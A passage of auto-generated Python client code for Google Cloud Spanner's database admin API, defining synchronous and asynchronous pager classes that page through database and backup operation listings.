method: Callable[..., Awaitable[spanner_database_admin.ListDatabaseOperationsResponse]],
request: spanner_database_admin.ListDatabaseOperationsRequest,
response: spanner_database_admin.ListDatabaseOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabaseOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[operations.Operation]:
async def async_generator():
async for page in self.pages:
for response in page.operations:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupOperationsPager:
"""A pager for iterating through ``list_backup_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBackupOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., backup.ListBackupOperationsResponse],
request: backup.ListBackupOperationsRequest,
response: backup.ListBackupOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[backup.ListBackupOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[operations.Operation]:
for page in self.pages:
yield from page.operations
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupOperationsAsyncPager:
"""A pager for iterating through ``list_backup_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListBackupOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[backup.ListBackupOperationsResponse]],
request: backup.ListBackupOperationsRequest,
response: backup.ListBackupOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[backup.ListBackupOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[operations.Operation]:
async def async_generator():
async for page in self.pages:
for response in page.operations:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |